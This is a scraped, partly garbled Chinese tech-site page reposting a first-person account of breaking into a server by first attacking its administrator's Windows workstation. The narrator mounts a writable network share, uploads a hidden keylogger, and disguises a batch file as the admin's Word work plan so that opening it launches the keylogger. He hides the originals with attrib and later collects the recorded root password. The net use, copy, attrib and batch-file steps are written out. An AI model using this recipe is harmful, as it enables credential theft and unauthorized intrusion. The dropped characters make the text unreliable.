最新标注
热门标注
历史更新
站点地图
RSS
Home
CrazyCoder
»
原创
»
it评论
»
it业界
»
互联网
»
精品软件
开发语言
»
网络编程
编程综合
嵌入式开发
算法
英文资料
汇编语言
PowerBuilder
p2p技术
验证码识别
DotNet
Java教程
C语言教程
C 教程
Delphi教程
VB教程
QQ协议开发
项目管理
»
数据库
»
Web开发
»
Python
Css教程
XML教程
网页特效
PhotoShop教程
Illustrator教程
CorelDraw教程
Ruby教程
CorelDraw教程
网站安全
开发平台-工具
Web
PHP教程
Flash教程
Ajax教程
Javascript教程
Html教程
Dreamweaver
Asp教程
技术综合
»
软件测试
办公软件
QQ相关
Windows
网络技术
游戏开发
软件工程
软件教程
编程思想
游戏开发
外挂开发
OpenApi
AutoCad
广告设计
3D设计
平面设计相关
移动手机开发
服务器
»
Linux
Unix/FreeBsd
web服务器
服务器技术
安全
博文摘选
»
翻译
首页
»
安全
» 黑客入侵实例:从实战中学习 黑客的入侵Linux例子
Rss订阅
黑客入侵实例:从实战中学习 黑客的入侵Linux例子
on 2009-9-12
in
安全
|
0 Comment
我发现了
个网站WebSite
于是常规入侵
很好
它
FINGER开着
于是我编了
个SHELL
aaa帐号试到zzz(这是我发现
个网上规律
那就是帐号
长度和口令
强度成正比
如果
个帐号只有两 3位长
那它
口令
般也很简单
反的亦然
故且称的为若氏定理吧)
结果
个帐号也不存在
我没有再试它
帐号
我被它开
端口吸引住了
它开着WWW
我就不信它不出错
连拿了 5种CGI和WWW扫描器总计扫了 3 4百种常见
它几乎都不存在
有几个
但我不知道如何利用
算了
又绕着主机转了几圈
象狐狸遇见刺猬
无从下嘴
还是看看root
信息吧:
finger
[email protected]
Login name: root In real l
e: system PRIVILEGED account Directory: / Shell: /bin/sh Last login Fri Jul 28 09:21 _disibledevent=>root经常来
那个202.xx.xx.xx就是他用
工作站了
从那会不会看到点东西呢?
net view \\202.xx.xx.xx Shared resources at \\202.xx.xx.xx Sharename Type Comment x x 我
公文包 The command was completed successfully.
在上网
机器上开着WINDOWS
“文件和打印机共享”
服务
是很多人容易掉以轻心
这个root没有例外
如果它
C盘共享了而且可写那就好了
但那是做梦
现在开了共享
目录没有
个是根目录
连D驱
都没有
别着急
慢慢来
x掉
那些文件夹都没用
不能写
里面尽是些英文原著
这个root还挺行
“我
公文包”吸引了我
注意
这是
个用于将区别
机器上
资料进行同步
工具
很显然这个root要经常更新主机上
主页
有时候在自己
机器上编
有时候在主机上编……所以很重要
点:“我
公文包”
共享
般都是可写
! 那我再进去看看
>net use i: \\202.xx.xx.xx >i: >echo asdf>temp.txt
不错
确实可写
>del temp.txt
不留痕迹——黑客
习惯
>dir/od/p
看看都有些什么…… 倒数第 2排那个是什么?“X月工作计划.doc”!就是它了
既然是计划就不可能写完了就丢
边
它肯定会再次打开它
——至少下个月写计划时要COPY
下:-> 该动手了
我
目标就是让它下次打开时误中我
陷阱而运行我藏
木马
我这次用
是
个键盘计录软件SoftwareHOOKDUMP
我觉得它挺好
价钱实惠
量也足…… 对不起
说习惯了
应该是它不仅记录下全部击键
还记录下打开或关掉了什么
、按过什么按纽、用过什么菜单…… 总的
它
记录让你就和你站在他身后看他操作计算机
样详细了
您要问那么多木马你为啥装这个?要知道无论是中国
冰河、netspy还是外国
netbus、BO
都被各种杀毒软件Software列为头号侦查对象
而
个root
机器上可不可能没装杀毒软件Software?还是HOOKDUMP好
小小
不起眼
不过如果大家都用只怕我再用它
机会就少了……
>copy hookdump.* i:
补充
点:上传前先编好它
hookdump.ini文件
置为隐藏方式运行
不然root
运行屏幕上蹦出
大窗口可就…… 然后再在自己
机器上编
个同名
BAT文件:X月工作计划.BAT
>edit c:\X月工作计划.BAT @echo off hookdump attrib -h X月工作计划.doc C:\Program Files\Microsoft\Office\Winword X月工作计划.doc attrib -h temp.bat del temp.p
del temp.bat
看明白了吧?root运行了这个BAT文件实际上就是先运行木马
再
WINWORD文件打开它想开
这个文件
然后自我删除
也许它机器上WINWORD
位置区别
那
就会失败
不过不要紧
反正BAT会马上删除
他会以为是自己
误操作
这时你
C驱根目录就有了这么
个BAT文件
它是
个方形
图标
和那个WORD文件大相径庭
root如何会运行它呢?没关系
在这个文件上点右键
点属性
在“
”栏选“更改图标”不就行了吗?WORD
图标在你机器C:\Program Files\Microsoft\Office\中
还要将“运行”改为“最小化”
“退出时关闭”打上勾
这样才能保证在运行时
点迹象也没有
事实上这个BAT文件变成了两个
还有
个PIF文件就是它
图标
把这两个文件传上去:
>copy X月工作计划.bat i: >copy X月工作计划.p
i:
然后把它
文件和自己
文件都藏起来:
>attrib +h X月工作计划.doc >attrib +h X月工作计划.bat
这样
root
“公文包”里只剩下
个和原来
模
样
WORD图标
他做梦也没想到这已变成了
个BAT文件
然后可以喘口气了
让我们静静
等…… 几天后
我进入这个工作站
取下记录下来
击键记录
找出root
口令
进入主机
上
篇文章:
次Win2003服务器下
完全克隆
下
篇文章: 用QQ皮肤来做后门入侵
Tags:
黑客入侵
linux黑客工具
linux黑客
黑客入侵实例
延伸阅读
2010-12-8
--
黑客入侵,黑客入侵WindowsXP系统常用七大招数
2010-12-9
--
怎样防止黑客入侵,黑客怎样入侵Linux系统
2010-12-8
--
黑客入侵,黑客入侵WindowsXP系统常用七大招数
2011-3-29
--
澳大利亚议会,疑似中国黑客入侵澳大利亚议会计算机系统
2011-2-6
--
黑客入侵,纳斯达克系统曾数次遭黑客入侵
2009-9-12
--
blackhat:blackhat 2003 黑客大会的另外一篇有关UNIX ftp入侵
2009-9-5
--
如何防止黑客入侵:防止黑客入侵ADSL的一些窍门技巧
2009-9-2
--
linux黑客:为Linux蒙上Windows面纱请黑客入瓮
2009-9-12
--
黑客入侵:黑客实战  系统泄露密码入侵攻击分析
2009-1-17
--
黑客入侵:妙用屏幕保护密码 防范黑客入侵
最新评论
发表评论
昵称
评论
验证码
点击图片更换
赞助商广告
随机更新
maclion,Mac OS X Lion第三款预览版发放
彭博商业周刊:Facebook离不开的女人
赞歌唱,丧钟敲响,赞歌唱起
qq空间签到位置,中国位置签到服务发展现状与趋势
Access和SQL Server的语法区别
开曼群岛注册,中国互联网公司纷纷离岸注册开曼群岛
industry,AOL将针对行业人士推出新型社交服务Industry
支付宝现金流,支付宝的现金流与马云的烦恼
腾讯QQ正式开放:第三方应用商共享6.47亿QQ用户
cdata,javascript CDATA的意义
徐州英才网招聘会,徐州英才网5月28日国际会展中心第三十九届名企优才大型招聘会
云计算发展趋势,产业化已成趋势 云计算迎来拐点
数组与链表的区别,数组名a和&a的区别
iso9001,8thManage与ISO9001
掌机开发者之家,百度应用平台上线 开发者有望不再免费打工
马云帝国内幕:不为人知的政治体系及内幕冲突
谷歌努力超越苹果10种方式:从开放走向选择性
iphone外壳,苹果iPhone 5水晶外壳曝光 显示屏或更宽
我的成长之路,我的计算机成长之路(1)
“疯狂的苹果”大事记:暴力、盗窃、诈骗
企业如何信息化,企业如何应对信息化的冲击
Silverlight实用窍门系列:41.Silverlight中调用麦克风模拟录音机设备,存储为WAV音频【附带实例源码】
oracle下载,Oracle下载地址大全
twitter,Twitter的演变史
后起之秀,18款Linux游戏后起之秀(第二部分)
微博烧钱,新浪追加1亿发展微博 持续烧钱还能火多久
三星 5 系 Chromebook 初印象
sns微博,社区形态能否超越BBS、微博、SNS
马云股东大会开腔:我对雅虎没信心
支付宝重组:马云和巴茨的博弈或谎言?
热门标注
远远不够成就
(1)
平方乘算法
(1)
大数分解算法
(1)
大数阶乘算法
(1)
大数相乘算法
(1)
中性色装修
(2)
华为中庸
(1)
华为手机初始密码
(1)
华为超级密码
(1)
华为路由器密码
(1)
华为手机密码
(1)
什么叫谈定
(1)
谈定哥
(1)
谈定是什么意思
(1)
信用卡开卡送礼
(1)
办信用卡送礼
(1)
疯狂的骗局
(1)
赌王大骗局
(1)
很多人一起结婚
(1)
梦见很多人在一起
(1)
最近更新
网吧如何免费上网,在网吧上网如何保护隐私
分布式攻击,几种分布式攻击的防范(1)
tcpip,利用IRIS学习TCP/IP(下)(图)
网络安全:新手也能对付病毒--破解恶意网页十大
Win2000 Server入侵监测
Windows下权限设置详解
简明法语教程,DoS攻防简明问答
sygate,SyGate相关
服务器防火墙,巧用Windows 2003构筑校园网服务器防火墙
网络防火墙,传统网络防火墙的五大不足
加密解密,软件狗[Dongles]的加密与解密技术(2)
防火墙,再谈防火墙及防火墙的渗透
国内外著名的桥,国内外著名防火墙集锦
木马清除大师,几种木马手工清除方法
奥拉星初识异空间,初识HTTP协议
防火墙工作原理,防火墙的工作原理
损坏硬件的病毒,安全知识:不可不留神 病毒 损坏 硬件有七大损
网络安全讲座之:攻击与渗透(9)
瑞星卡卡上网助手,偏不迷信360看瑞星卡卡上网安全助手十大安保利
黑客攻防技术,黑客攻防技术内幕-解读黑客(3)
最新标注
ipad免费软件
(1)
ipad软件下载
(1)
ipad2软件
(1)
ipad软件
(1)
html5软件
(1)
苹果ios开发
(1)
苹果ios游戏
(1)
分享网
(1)
字符动画
(1)
animator
(1)
审查起诉的期限
(1)
审查起诉
(1)
审查起诉期限
(1)
互联网审查
(1)
中国互联网审查
(1)
开源软件云计算
(1)
云计算开源平台
(1)
开源云计算
(1)
苹果4反应慢
(1)
苹果2代反应慢
(1)
最新评论